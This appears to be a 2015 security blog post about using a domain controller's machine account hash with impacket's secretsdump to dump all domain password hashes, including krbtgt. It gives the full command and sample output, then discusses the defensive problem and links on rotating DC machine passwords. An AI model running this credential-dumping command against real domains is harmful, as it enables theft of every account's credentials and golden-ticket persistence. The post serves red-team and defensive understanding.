Friday, September 25, 2015

Domain Controller Machine$ Account To Dump Hashes Notes


In case you missed it, Mubix posted this post a few days ago:

http://www.room362.com/2015/09/using-domain-controller-account.html

The great part of the post in case you didn't see/understand is that you can dump hashes from the domain controller using the Domain Controller machine account (example: CORP-MYDC$).  So finally a use for all those machine accounts you normally just cut out from pwdumps :-)

Whats also important about this from the defensive perspective is you can roll the krbtgt password but if an attacker still has the ability to talk any domain controller (and at some point dumped the full domain hashes) they can attempt to re-pull the hashes or most importantly the new krbtgt hash to create new golden tickets.

I'm going to steal Rob's impacket secretsdump output here in case it disappears in the future.

python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc LAB/DC2k8_1\$@172.16.102.15

Impacket v0.9.14-dev - Copyright 2002-2015 Core Security Technologies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::


Note: this is a 1-to-1 functionality, meaning DC2k8_1 hash needs to authenticate against DC2k8_1 IP address. If you do this against DC2k8_2 obviously it will fail.

Not sure on how to address this honestly.  More frequent machine password changes for domain controllers may be in order and initial reading says you can use netdom.exe to make the change as well. More info here:
http://blogs.technet.com/b/askds/archive/2009/02/15/test2.aspx
http://windowsitpro.com/active-directory/reset-computer-active-directory-password-command-line
https://support.microsoft.com/en-us/kb/325850 < --netdom.exe info

If anyone has resources/suggestions on managing this please post up.


CG

No comments: